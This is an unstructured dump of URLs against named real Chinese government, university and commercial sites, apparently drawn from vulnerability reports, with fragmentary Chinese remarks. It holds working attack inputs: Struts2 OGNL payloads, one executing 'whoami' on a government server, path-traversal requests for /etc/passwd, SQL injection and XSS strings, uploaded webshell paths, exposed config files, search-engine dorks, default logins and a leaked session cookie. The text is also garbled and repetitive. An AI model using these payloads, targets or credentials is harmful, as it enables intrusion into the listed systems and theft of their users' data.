https://www.hodo.cn/webapp/wcs/stores/servlet/AjaxLogonForm?catalogId=10001&langId=-7&storeId=10151&krypto=JeuX+VEXYJDb5ICN8N5ebOfDqYAM9VLjrCb+L42et5s=&ddkey=http:AjaxLogonForm#https://www.hodo.cn/mall/AjaxHistoryOrdersView?breadCrumb=Brcmb¤tSelection=OrderDetailSlct&objectIdParam=orderId&catalogId=10001&langId=-7&orderId=3720529&storeId=10151&orderStatusCode=&identifier=1392122503362 https://www.hodo.cn/mall/AjaxHistoryOrdersView?breadCrumb=Brcmb¤tSelection=OrderDetailSlct&objectIdParam=orderId&catalogId=10001&langId=-7&orderId=3720529&storeId=10151&orderStatusCode=&identifier=1392122503362 https://www.hodo.cn/mall/AjaxHistoryOrdersView?breadCrumb=Brcmb¤tSelection=OrderDetailSlct&objectIdParam=orderId&catalogId=10001&langId=-7&orderId=3720528&storeId=10151&orderStatusCode=&identifier=1392122503361 http://www.wangjiu.com/ http://www.zjg.gov.cn/home/ http://www.zjg.gov.cn/home/WebVote/SubDefault.aspx?VoteGuid=ac192292-fac4-49b8-abf2-fd175f2f90f4 http://www.zjg.gov.cn/home/zwgkinfo/DepartMent/Default.aspx?DeptCode=001004 http://www.zjg.gov.cn/home/zwgkinfo/DepartMentInfoList.aspx?CategoryNum=096&DeptCode=001004 http://www.camel.com.cn/member/orderdetail.aspx?orderId=368250)修改订单的id可查看任意订单,里面有收货相关敏感信息 mail.sei.pku.edu.cn/pipermail/act/2010-November/000225.html‎ http://mail.sei.pku.edu.cn/pipermail/act http://mail.sei.pku.edu.cn/ http://www.hneao.cn/gkkw/login.action?act=toMain http://www.cqpost.com/ask/search.aspx?type=%27&word= http://www.lfxcw.gov.cn/data/1.rar http://www.3need.com/admin.php# http://www.3need.com/liepin.php?do=five&id=13 http://hr.chinacdc.cn/ http://www.pubwin.com.cn/WEB-INF/classes/kodo.properties http://bbs.pubwin.com.cn/convert/index.php https://vip.lenovodata.com/images_per/logo.gif/1.php http://www.amap.com//agent/user/tmp/a8fa05d0a0a5814acea6717e79ddadd0.jpg/1.php http://www.hnsn.gov.cn/display.asp?id=12031 http://vip.club.sohu.com/szzmjc/public/upload_img/swfupload/swfupload.swf, http://baidu.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065 http://bbs.amap.com/misc.php?mod=ranklist inurl:vehweb/navigator index.php/storeHome/axisRight http://hotel.11185.cn/index.aspx http://hotel.11185.cn/admin/Login.aspx http://hotel.11185.cn/admin/ http://hotel.11185.cn/ckfinder/ http://hotel.11185.cn/images/ index.php/storeHome/axisRight http://www.super.cn/ http://112.124.56.216:8080/Super/EmptyClassroom/findEmptyClass.action http://english.nmefc.gov.cn/ http://english.nmefc.gov.cn/NewsLevel1Severlet.do?id=7 http://www.nmefc.gov.cn/nr/resultlogin.aspx?flag=result http://www.nmefc.gov.cn/special/login.aspx?special=1 http://neargoos.nmefc.gov.cn/login.php http://www.nmefc.gov.cn/haixiao/login.aspx http://news.qmango.com:8080/1.txt URL:http://www.linekong.com/pay/xk_core.php?city=%E6%B1%9F%E8%8B%8F http://duokoo.baidu.com/xs/?R=887&bck=12748&v=2&pageid=Ypz77o4s&simple=0&ssid=0&from=844b&bd_page_type=1&uid=3663087215BE9B812C8404F0442D89C1%3AFG%3D1&pu=sz%401320_2001%2Cta%40iphone_1_7.0_3_537&fr=xs_ios&netFlag=cmnet&dkfrc=6&usid=AB6FE7D5345504C4A1CCB1F2A481C4D1&word=%F0%9F%98%84xsstest%27onfocus=alert%281%29%20autofocus=%27 http://t.sohu.com/gy http://t.sohu.com/gy/twitter/help http://www.11185.com.cn/u/getAutoPayOnline.html http://www.ncosm.gov.cn/ http://www.ncosm.gov.cn/new/ViewInfo.asp?id=1441&sortname=%EF%BF%BD%EF%BF%BD%EF%BF%BD%C4%B6%EF%BF%BD%CC%AC&sortid=103 http://www.ncosm.gov.cn/new/ViewInfo.asp?classid=171&sortname=%D2%B5%CE%F1%C4%DC%C1%A6&id=907 http://www.ncosm.gov.cn/new/ViewInfo.asp?id=1442&sortname=%D0%C5%CF%A2%BC%EC%CB%F7 http://网站地址/index_map.action?departId=xxxxxxxxx http://web1.psych.ac.cn/admin/MakeChanneltoHTML.php?channelID=22&language=CN http://web1.psych.ac.cn/admin/MakeTopictoHTML.php?channelID=22&topicID=92&language=CN http://enginpsych.psych.ac.cn/cn/news.php?type=1&sortid=221 http://enginpsych.psych.ac.cn/cn/piclist.php?type=4&sortid=188 http://enginpsych.psych.ac.cn/cn/info.php?type=2&sortid=222 http://enginpsych.psych.ac.cn/cn/shownews.php?type=1&id=392&sortid=221 http://enginpsych.psych.ac.cn/en/news.php?type=1&sortid=237 http://enginpsych.psych.ac.cn/cn/showpicnews.php?type=4&sortid1=&sortid=188&id=252 http://enginpsych.psych.ac.cn/en/info.php?type=2&sortid=240 http://enginpsych.psych.ac.cn/en/shownews.php?type=1&id=393&sortid=237 http://enginpsych.psych.ac.cn/en/piclist.php?type=4&sortid=244 http://enginpsych.psych.ac.cn/en/news.php?type=1&sortid=237 http://bdgene.psych.ac.cn/advancedPathwaySearch.do?pwsource=i-GSEA%20analysis http://www.bjucoss.com:8090/mscp/business/actionreport.action http://www.fjmf.gov.cn/ http://www.fjmf.gov.cn/Login.aspx?t=sjjs http://t.sohu.com/live/3572 http://t.sohu.com/live/insertw http://womag.iphone.unisk.cn/mobileserver/action/server.do google:inurl:Templates http://www.bkjy.sdnu.edu.cn/notice1.jsp?pk_notice=1806 http://office.homeinns.com/hcs/login.aspx http://www.ntjczxz.com/ http://www.ntjczxz.com/front/OceanPage.aspx?id=14&mid=2 http://www.ntjczxz.com/tflj/index.asp?sys=7 www.jxjsjy.com www.jxjsjy.com权限也很大。 http://506srm.cofco.com http://506srm.cofco.com/supermarket/Index_ItemView.aspx?ItemId= http://506srm.cofco.com/custom/Fortiens/Comm/MainPage/yzm.aspx?id= http://506srm.cofco.com/custom/supermarket/Index_ItemView.aspx?ItemId= http://506srm.cofco.com/custom/supermarket/CreateSuperMarketBill.aspx?ItemId= http://m.pcauto.com.cn/cmt/13103338_3760120_5.html http://www.gpai.net/index_index.action?searchKind=1&searchType=1¤tPage=1 www.xmtj.xcmcn.com)也一样 http://fj.11185.cn/ctable/czjfAction_addSzzffsRedirect.action http://english.352.cn/ http://test1.sxhs.cn/sl/sljxjy/log.asp http://test1.sxhs.cn/ http://www.8231.cn/list.php?category=0可以爆出数据库,可以得到数据库信息,还可以任意修改数据库,也可以得到www.92game.net的信息,还有其他网站 http://xlzx.psych.ac.cn/newslist.php?id=75 http://xlzx.psych.ac.cn/topnewslist.php?id=74 http://xlzx.psych.ac.cn/about.php?id=32 http://xlzx.psych.ac.cn/newsdetail.php?id=559&fu_id=3 http://xlzx.psych.ac.cn/xinsjlt/news_content.php?id=416&f_id=90 http://xlzx.psych.ac.cn/xinsjlt/articles.php?id=451 http://xlzx.psych.ac.cn/xinsjlt/cont_i.php?f_id=100&id=467 http://xlzx.psych.ac.cn/xinsjlt/newscontimg.php?f_id=94&id=435 http://xlzx.psych.ac.cn/xlwhyth/news_content.php?f_id=111&id=613 http://www.cbdf.cn/admin http://www.cbdf.cn/themes/cbdf/upload/files/download/webconfig.php.aaa http://www.chinafoodsltd.com/ http://www.chinafoodsltd.com:8080/IR/activity.jsp?ClassID=2014 http://www.chinafoodsltd.com:8080/IR_E/noticeDetail.jsp?ID=313 http://www.lncygt.gov.cn/content.php?cid=13&aid=2707 http://125.35.24.219/publish/default/ http://125.35.24.219/publish/default/ http://www.crfeb03.com/list.php?fid=1 http://www.crfeb03.com/search.php http://www.crfeb03.com/list.php?fid=1 http://m.mapabc.com/.svn/entries svn://172.17.40.61/minimap/html svn://172.17.40.61/minimap svn:special svn:externals svn:needs-lock ubuntu:/tmp$ www.nextsns.com http://rs.lenovo.com.cn/index.php http://315.stock.hexun.com/WEB-INF/web.xml http://315.stock.hexun.com/WEB-INF/classes/prm_ctx.xml http://app.hexun.com/WEB-INF/web.xml http://ceshi.hexun.com/WEB-INF/web.xml http://wap.hexun.com/WEB-INF/web.xml http://221.176.36.101/update/ http://www.yj-jg.com/ http://xlzx.psych.ac.cn/ http://www.chinesepsy.org/ http://hhimc.cha.org.cn/中国医院协会医院医疗保险管理专业委员会 http://www.eapacn.org/ http://www.nclexchina.com/ http://haicangjijin.org/ http://www.marco-bj.com/ http://www.tripure.com.cn/ inurl:login!forwardFrameIndex.action http://szxy.cxzj.net/ks/login/login!forwardFrameIndex.action http://e.lzszyjsxx.com/zy/login/login!forwardFrameIndex.action http://60.216.250.45/zc/login/login!forwardFrameIndex.action http://121.31.60.35/oa/login/login!forwardFrameIndex.action http://www.aqcz.gov.cn/management/index.php?c=main&a=forContent&table=zxly_hdjl&menuid=34&table_def=def_zxly_hdjl&limitNum=3却可以直接访问,还可以删除回复。 http://www.dajie.com/message/terminal?contractUid=11200561 http://it365.yesky.com/WEB-INF/web.xml http://it365.yesky.com/WEB-INF/classes/conf/datasource.xml http://manage.jxs.yesky.com/WEB-INF/web.xml http://admin.m.yesky.com/WEB-INF/web.xml http://autoproduct.yesky.com/WEB-INF/web.xml http://jgdw.chinasafety.gov.cn/ http://jgdw.chinasafety.gov.cn/smodel?model=04000000000000000633&search= http://www.xjcms.chinasafety.gov.cn/ http://www.xjcms.chinasafety.gov.cn/PfWebApp/RecOrSendFile/FileInfo.aspx?strInstanceId=BC3C6E12-923C-43F8-8F81-3A644EC148C3&WinItemFormatId=E19B7A9F-4673-4B87-8BA9-4E1671D3D7EE&FromType=0 http://www.oohdear.com/ http://www.oohdear.com:80/ www.oohdear.com http://117.135.147.82:8080 http://pay.linekong.com/ http://www.hengnan.gov.cn/sssweb/DirectoryPublic/main.aspx?DeptID=DA0011 font-family:font;"可以添加任意CSS属性。 http://kefu.linekong.com/eService/ http://www.fjspaq.com/default/verify.action http://www.fjspaq.com/default/verify.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://bjd.tcl.com/Newslist.aspx?code=0401 http://bjd.tcl.com/Newslist.aspx?code=0401‘,异常,并爆出网站绝对路径,如图 http://csm.bjd.tcl.com/ http://wooyun.org/bugs/wooyun-2010-048040 http://v.sogou.com/vc/topic.jsp?s_url=[内容可控 xxx.com/SubjectSearch.aspx?cn=64 http://203.95.109.55:8788/secure/Logout!default.jspa http://203.95.109.55:8788/browse/BBSS-MT-17233p http://114.247.129.12/ulp/login.jsp### http://www.gylgb.gov.cn/show_news.asp?News_Class=123%20and%201=1&Nid=1440 http://www.gaoyou.gov.cn/gzcy/gzcy_bmxx_submit.php?depart_bianhao=15&depart_name=%B0%B2%BC%E0%BE%D6 http://statistic.terminal.lashou.com/show/login.php http://www.cloudsensing.cn:8082/admin.html http://www.boccfc.cn http://english.casm.ac.cn/index.php?col=7&file=31&PageNum=5 http://english.casm.ac.cn/old/ http://zhangheng.v2.taodiantong.cn http://zhangheng.v2.taodiantong.cn:80/ http://mp3.easou.com/ http://ulearning.gmcc.net/exam/index.php http://blog.douban.com/wp-admin/ Cache-Control:must-revalidate Connection:keep-alive Content-Type:text/plain Date:Thu Expires:Sun Keep-Alive:timeout=10 Location:http://www.douban.com/ P3P:CP="IDC Pragma:no-cache Server:nginx Set-Cookie:as="deleted Set-Cookie:ue="xxxxx@gmail.com Set-Cookie:dbcl2="2025898:RxSxqemxX5Qd4 X-Douban-Splittest:sns.is_recommended_user,movie.new-cinema-section,movie.has_video http://cms.qingdao.gov.cn:10000/cmsweb/admin/loadUserAttrAction.do?dn=dc=cms,cn=human,sn=1 http://cms.qingdao.gov.cn:10000/cmsweb/admin/resetUserPasswordAction.do?dn=dc=cms,cn=human,sn=1 http://cms.qingdao.gov.cn:10000/cmsweb http://cms.qingdao.gov.cn:10000/n16858051/n16858711/n28030640.files/n28030645.jsp http://124.207.244.222/ google:m/search/list.php?siteId= http://www.jxjsjy.com/login.html登录后,会弹出一个完善个人信息(身份证、邮箱、手机)的窗口 http://www.smb-store.com/fckeditor/editor/filemanager/browser/default/browser.html?Connector=../../connectors/aspx/connector.aspx http://postmail.com.cn/ http://www0.super8.com.cn/mobileInterface/Super8Interface.asmx?op=getCustInfo存在sql注入 Super8Interface.asmx/getCustInfo www0.super8.com.cn http://www0.super8.com.cn http://211.152.123.124/ http://www.cnpostair.com/ http://www.cnpostair.com/yw.asp?xwClass=%D2%B5%EF%BF%BD%EF%BF%BD%CE%A7 http://www.cnpostair.com/show_news1.asp http://elqlf.haimen.gov.cn/hmqlyg/link_iframeUrl.do?url=/hmqlyg/wjdc_toWjdc.do?id=9657C99F8C3247EE9A6386C6E6F8F7EF@mc=s_hms http://58.221.238.243:8808/dflzjszxcp/employee_toLogin.do http://58.221.147.11/jslyqtrd/manage/ns_toshouye.do?webid=rd http://www.ntcredit.com/cms/manage/ns_toshouye.do http://oa.jiaji.com/oa http://219.134.187.48/manager/html http://219.134.187.48/tomcat/ http://decoclub.ellechina.com/calendar_cont.php?calid=12 http://decoclub.ellechina.com/detailopus.php?leftlogin=islogin&uid=34 http://decoclub.ellechina.com/detailopus_cont.php?id=66&uid=34 http://decoclub.ellechina.com/detailopus_msg.php?uid=34 http://decoclub.ellechina.com/detailopus_pic.php?uid=34 http://decoclub.ellechina.com/masterlarge.php?id=7 http://decoclub.ellechina.com/msg_act.php?uid=34 http://decoclub.ellechina.com/opuslist_cont.php?id=33/2 www.hikvision.com www.ys7.com www.shipin7.com http://www.hikvision.su/ http://www.hikvision.su/search.php?search_term=-1 http://www.hikvision.su/search.php?search_term=-1 http://www.hikvision.su/search.php?search_term=-1 http://www.hikvision.su/search.php?search_term=-1 http://www.hikvision.su/search.php?search_term=-1 http://app.nn365.org.cn/?app=vote&controller=vote&action=total&contentid=1 http://www.kaixin001.com/records/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg-30.html http://211.136.111.144:8080/NCMBH/user/login?, http://211.136.111.144:8080/NCMBH/user/info http://www.teamhd.net(上海腾翼多媒体)是一家专注广告机的公司,继http://wooyun.org/bugs/wooyun-2014-041143上次旗下IPUB联网数字标牌管理系统4.x系列都存在struts2漏洞修复之后,再次发现,系统存在Debug调试模式代码执行漏洞。 www.leiansoft.com http://www.leiansoft.com/admin/ http://www.leiansoft.com/admin/edit/admin/login.asp http://mail.leiansoft.com/ http://125.98.76.40/login.aspx?ReturnUrl=%2fDefault.aspx http://www.huxiu.com/member/edit_profile.html?is_ajax=1 www.nandu.com登陆时跳到了http://user.nandu.com/passport/index.php,于是注册登陆。 http://sns.nandu.com/home.php?mod=spacecp&ac=avatar http://user.oeeee.com/nduser/data/tmp/uploadxxx.jpg/1.php http://www.cpac.com.cn/ http://www.cpac.com.cn/manage/admin/admin_index.aspx http://124.207.29.201/ http://124.207.29.201/CheckUserName.asp?username= http://124.207.29.201/zygg_fb/ggzx/chaxun_guandian.asp http://124.207.29.201/zygg_fb/zcfg/chaxun_yzxgyw.asp http://124.207.29.201/zygg_fb/zcfg/chaxun_xgzs.asp http://124.207.29.201/zygg_fb/wzcp/wzcp_chaxun.asp http://124.207.29.201/zygg_fb/zcfg/chaxun_sbf.asp http://124.207.29.201/zygg_fb/zcfg/chaxun_yzf.asp http://124.207.29.201/zygg_fb/zcfg/chaxun_fagui.asp http://124.207.29.201/zygg_fb/zcfg/chaxun_zzf.asp http://124.207.29.201/zygg_fb/zcfg/chaxun_query_res.asp http://124.207.29.201/zygg_fb/zcfg/chaxun_zlf.asp http://124.207.29.201/zygg_fb/ggzx/chaxun_hangye.asp http://124.207.29.201/zygg_fb/ggzx/chaxun_zhishi.asp http://124.207.29.201/zygg_fb/ggzx/chaxun_diaoyan.asp http://124.207.29.201/zygg_fb/ggzx/chaxun_shiye.asp http://124.207.29.201/zygg_fb/ggzx/chaxun_fenxi.asp http://124.207.29.201/zygg_fb/ggzx/chaxun_guandian.asp http://124.207.29.201/zygg_fb/zcfg/chaxun_yzxgyw.asp http://124.207.29.201/zygg_fb/zcfg/chaxun_xgzs.asp http://124.207.29.201/zygg_fb/zcfg/chaxun_zd.asp http://124.207.29.201/zygg_fb/zcfg/chaxun_mt.asp http://124.207.29.201/zygg_fb/zcfg/chaxun_yl.asp http://124.207.29.201/zygg_fb/zcfg/chaxun_ys.asp http://124.207.29.201/zygg_fb/zcfg/chaxun_qt.asp http://124.207.29.201/zygg_fb/zuoping/chaxun_2004y1.asp http://124.207.29.201/zygg_fb/zuoping/chaxun_2004j1.asp http://124.207.29.201/zygg_fb/zuoping/chaxun_2004t1.asp http://124.207.29.201/zygg_fb/huwaimeiti/search_res.asp http://124.207.29.201/zygg_fb/zhaopin/search_res.asp http://124.207.29.201/manage/ http://www.dbk.cn/ http://www.dbk.cn/common/showPic.asp?MID=4759&CNO=2008028 http://www.dbk.cn/Catalog/Catalog_Text.asp?BID=1&ORD=1 http://www.dbk.cn/SuperLibtary/ArticleSmall.asp?sid=106 http://www.dbk.cn/Catalog/ClassSearch_Text.asp?ORD=1&SID=1 http://www.dbk.cn/Catalog/ShorpCar.asp?CID=1 http://www.dbk.cn/Catalog/Catalog_Text.asp?ORD=1&BID=1 http://www.dbk.cn/catalog/shorpcar.asp?PID=87361 http://www.dbk.cn/Catalog/ClassSearch_Text.asp?SID=1&ORD=1 http://www.dbk.cn/Catalog/Catalog_Pic.asp?Ord=1&bid=1 http://www.dbk.cn/Catalog/ClassSearch_pic.asp?Ord=1&sid=1 http://www.dbk.cn/Catalog/MagazineDetail_TB.asp?MID=5046&TID=1 http://www.dbk.cn/SuperLibtary/ArticleReview.asp?aid=38243 Url:http://demo.zoomla.cn/Plugins/Register.aspx http://m.law-lib.com/fzdt/news_content.asp?Artcle_id=78311 http://m.law-lib.com/cpws/cpwsml.asp?pages=2&type=cx http://m.law-lib.com/flsz/szml.asp?flh=a http://www.google.de/#newwindow=1&q=inurl:messageShow!show.action http://123.125.114.213/heat-map/upload/2.jsp,发现返回“Helloworld”,由此证明上传漏洞存在。 http://checi.tieyou.com/2251/2253/2257.html http://checi.tieyou.com/2251/2253/【注射语句】/2257.html http://checi.tieyou.com/2251/2253/*/2257.html http://www.yiban.cn/profile?userid=708484 http://www.yiban.cn/ajax/user_news_json_2013.php?v=9679 www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ http://www.google.co.in/search?sourceid=chrome&ie=UTF-8&q=inurl%3Acms%2FColumn.aspx%3F tencent://message/?Menu=yes&uin=68084160 tencent://message/?Menu=yes&uin=68084160&Site=&Service=119&sigT=2be80b3ce9cd480c95dc199635091cde577e2d8772609c471c9c976ffdd6a5fd8c1ad46e5b26a460c7e13b0f1f666d18&sigU=b1f96dbc1459d6112096ff0242c4e5823dad12504f1b5d9b8b874a876d5a2ea4d6f7ba1d2ada1377 http://219.134.187.6/manager/html ttp://219.134.187.48/tomcat/ line:1020 http://www.17miyou.com/zb/zblist.aspx?rolename=aa http://113.105.131.219 http://113.105.131.219/system/tree/pubTree!getChlildOrgByParentId.action http://union.tieyou.com/ http://www.law-lib.com/ http://www.law-lib.com/cbs/cbs-view.asp?cbsm=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://www.law-lib.com/flsz/szml.asp?flh=a http://www.law-lib.com/lawseek/wzcoun.asp?wz=http://www.fasac.cn/lawyer http://www.law-lib.com/lawseek/wzcoun.asp?wz=http://www.yjlawyer.cn/Main/NewsView.asp?ID=324&SortID=4 http://www.law-lib.com/flsz/szml.asp http://www.law-lib.com/lawyer/lawyerlogin.asp http://mall.heilanhome.com/ http://dg.gov.cn/ site:dg.gov.cn wanjiang.dg.gov.cn/lk_admin/login.aspx‎ admin:admin http://video.bnup.com/acenter/ http://www.iactive.com.cn/acenter/index.action http://video.bnup.com/acenter/meeting!downloadDocument.action?filePath=./WEB-INF/classes/dataBase.properties http://video.bnup.com/acenter/user.action# URL:http://core.hnitsec.gov.cn/zfaqcore/login.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27whoami%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://ip/wcm/console/tabPage.do?url=%2Fconsole%2Findex.do http://ip/wcm/console/tabPage.do?url=/../../../index.do此时就会进入如下页面 http://univ.zte.com.cn/WebResource.axd?d=YaWGDzoSj5Nz2vcLkzdCwg2 http://tzsj.hefei.gov.cn http://cloud.cintv.cn/modelVideo.action http://push.tv189.cn:8087/pushService/push/clientreceive.msp?appid=10160010000&imsiid=310260000000000&imeiid=000000000000000 sendfiles.jsp/sendfile.do http://journal.pubmed.cn/search http://www.biomart.cn/s_expriment/s?t=5&wd=%22%3E%3C%2Fscript%3E%3Ciframe%20src%3D%23%20onerror%3Dalert%28%2Fby%20wooyun%2F%29%3E%3C%22: http://search.jobmd.cn/%22%3E%3C%20script%3E%3Ciframe%20src%3D.htm#%20onerror=alert%28/wooyun/%29%3E%3C%22 http://dir.sogou.com/v53/get_123_v53.php?block=wt&c=1392388088893&cbf=fn&city=../../../../../../../../../../etc/resolv.conf%00.jpg&gfg=1&method=ajaf&pid=AQ7CZ&ver=v53 http://221.208.198.214:9090/SHIPINENWeb/login!enterprise_login.action http://www.denwell.com/locations.php?ID=1 http://www.denwell.com/locations.php?ID=1 http://www.denwell.com/locations.php?ID=1 http://etif2013.ccnu.edu.cn/ http://bacic.bacic5i5j.com/log/stdout.log.20130423 http://www.satcm.gov.cn:82/ http://www.satcm.gov.cn:82/addmail.asp?classID=1&Nclassid=2 http://www.satcm.gov.cn:1982/admin/manage.asp http://daohang.sogou.com/v53/get_123_v53.php?block=wt&c=1392388088893&cbf=fn&city=../../../../../../../../../../etc/passwd%00.jpg&gfg=1&method=ajaf&pid=AQ7CZ&ver=v53 http://www.yn.gov.cn/ http://116.52.249.41/ http://116.52.249.41/getpass.php cn:111111 cn:admin888 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 cn:admin888 cn:111111 cn:111111 cn:123456 cn:654321 cn:111111 cn:111111 cn:111111 cn:123456 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 cn:123456 cn:123456 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 cn:123456 cn:123456 cn:123456 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 http://live.pps.tv/index.php/play/get_program_by_label?channel_id=1&channel_name=GDTV1&l_type=live&t_date=111111 http://live.pps.tv/index.php/play/get_program_by_label?channel_id=--&channel_name=GDTV1&l_type=live&t_date=111111 http://tapp1.enavi.118114.cn:8090/dttcservice/rest/info/getinfo/ http://tapp1.enavi.118114.cn:8090/dttcservice/ admin:admin http://tapp1.enavi.118114.cn:8090/dttcservice/file/1402101314197277.jsp http://tapp1.enavi.118114.cn:8090/dttcservice/file/data.jsp www.ctrip.com/member/signupcodesubmit.asp www.ctrip.com/member/signupcodesubmit.asp http://61.191.25.187/ http://61.191.25.190/ http://61.191.25.190:8080/osm2/adminInfo!login.action http://61.191.25.187/links.asp?keyno=557 http://61.191.25.187/view.asp?keyno=1088 http://www.google.co.in/search?newwindow=1&biw=1366&bih=642&q=inurl%3APolicy%2FshowPolicy.aspx&oq=inurl%3APolicy%2FshowPolicy.aspx&gs_l=serp.3...3471208.3473695.0.3474152.9.9.0.0.0.0.0.0..0.0....0...1c.1j4.35.serp..9.0.0.k5wvqKaD2a4 http://www.guokr.com/ask/),增加提问,未对问题标题进行输入和输入的过滤编码,导致存储型xss漏洞的产生。 http://202.85.215.180/loginAction_login.action http://www.500wan.com/ http://www.500wan.com/static/info/rcjc/project/09073_rcjcfs_5.txt http://www.kugou.com/mvweb/app/index.php?a=index&tag=15&page=1 http://s1.ppsimg.com/vod/file/poster_200/9a/68/9a68db1de3878383821d82cb8ecab0c6.php http://yun.pps.tv/file/poster_200发现403, yun.pps.tv/file/poster_200/9a/68/9a68db1de3878383821d82cb8ecab0c6.php http://www.avcon.com.cn/ http://www.google.co.in/search?sourceid=chrome&ie=UTF-8&q=inurl%3AchangLang.action http://meeting.nsjy.com/AvconWebService/fingerprint.jsp http://meeting.nsjy.com/AvconWebService/happyaxis.jsp http://wangba.9you.com/ucenter/SearchPointRewards.aspx http://wangba.9you.com/ucenter/SearchPointRewards.aspx http://map.wo.com.cn/siweidg_womap_Ser/news/news_getHotnews.action http://www.KnifeCMS.com/FileUpload inurl:type.do?tid= http://challengeyourdo.lenovo.com/challengeyourdo.zip http://www.ccard.net.cn/ http://www.ccard.net.cn/ccard/sortproduct/sortCard!soryCategory.action http://222.223.188.50/ http://222.223.188.50/login!login.action http://bbs.fumu.com/tj/app_rd.php?a=1 http://www.tljrw.gov.cn/read_news.asp?id=3296 http://epos.tianan-life.com/logon/station.jsp?menuCode=7777 http://files.sogou.com/.bash_history http://localhost/ http://localhost/ http://localhost/ ftp://proxy.wsfdupload.lxdns.com http://files.sogou.com/test/ http://files.sogou.com/test/ http://files.sogou.com/test/ files2.sogou.com/sogou_explorer_silent_2.0.0.891_2180.exe ftp://125.39.17.8 http://files2.sogou.com/"$NF http://files2.sogou.com/"$NF http://files2.sogou.com/"$NF files2.sogou.com/PreUpdater130619.exe http://localhost/se_plugin/getfile?key=8f3db89aa260989bbd315c8a26764933 http://localhost/se_plugin/getfile?key=8f3db89aa260989bbd315c8a26764933 http://localhost/se_plugin/getfile?key=8f3db89aa260989bbd315c8a26764933 http://www.weimob.com:80/Webcar/CarReserveBook/pid/3453/wechatid/fromUsername/type/* http://www.weimob.com/Webcar/CarReserveBook/pid/3453/wechatid/fromUsername/type/* http://order.gmacsaic.net/mpc/util/help/help.jsp?module_code=1 url:http://book.hongxiu.com/CoverPage.aspx?ID=19146 http://jifen.qq.com/action/vipmusic/vipMusic.html?ADTAG=JIFEN.HTML5.AD.3 http://jifen.qq.com/cgi-bin/mart/PayItem.cgi?Fromaq=true&GoodsID=573&UinNum=1767070717 http://cps.gome.com.cn/ http://cps.gome.com.cn/Home/NoticeDetail?id=132 http://cps.gome.com.cn/Earner/GetCode/AdsUserSelfEdit?id=901&webname=%E5%AE%B6%E7%BE%8E ed2k://|file|%E8%8B%B1%E9%9B%84%E4%BC%A0%E8%AF%B46%EF%BC%9A%E7%A9%BA%E4%B9%8B%E8%BD%A8%E8%BF%B9FC%E7%AE%80%E4%BD%93%E4%B8%AD%E6%96%873CD%E5%AE%8C%E7%BE%8E%E7%A0%B4%E8%A7%A3%E7%8F%8D%E8%97%8F%E7%89%88.exe|468173|F85A01E2F6049D10F1881ACDA4A9F704|h=MJLSJERMY4VYJIB5ZKPP7TQHQ6HI6USW|/ http://www.thinksaas.cn/。 http://mbox.kuwo.cn:8080/ur/reflect/ http://mbox.kuwo.cn:8080/ur/reflect/question.jsp http://mbox.kuwo.cn:8080/ur/uploads/ http://search.chinanews.com/was40/ http://search.chinanews.com/wasadmin/ site:xunlei.com http://pai.xunlei.com/server/ http://spark.m.xunlei.com/的数据库,登陆进去打了会儿酱油,但是没拿到shell http://221.181.100.150:9090/index.jsp inurl:more.php?LocationID=0302000000 inurl:more.php?LocationID= http://zzzy.chinacourt.org/public/more.php?LocationID=0302000000%27 http://dkxfy.chinacourt.org/fygl/more.php?LocationID=0302000000%27 http://ydxfy.chinacourt.org/public/more.php?LocationID=0302000000%27 http://xyqfy.chinacourt.org/fygl/more.php?LocationID=0302000000%27 http://yzzy.chinacourt.org/gg/more.php?LocationID=0302000000%27 http://jyqfy.chinacourt.org/fxyd/more.php?LocationID=0302000000%27 http://bjdxfy.chinacourt.org/public/more.php?LocationID=0302000000%27 http://hnsyzy.chinacourt.org/spdt/more.php?LocationID=0302000000%27 http://sxfy.chinacourt.org/public/more.php?LocationID=0302000000%27 http://hnhhzy.chinacourt.org/public/more.php?LocationID=0302000000%27 http://nbzy.chinacourt.org/public/more.php?LocationID=0302000000%27 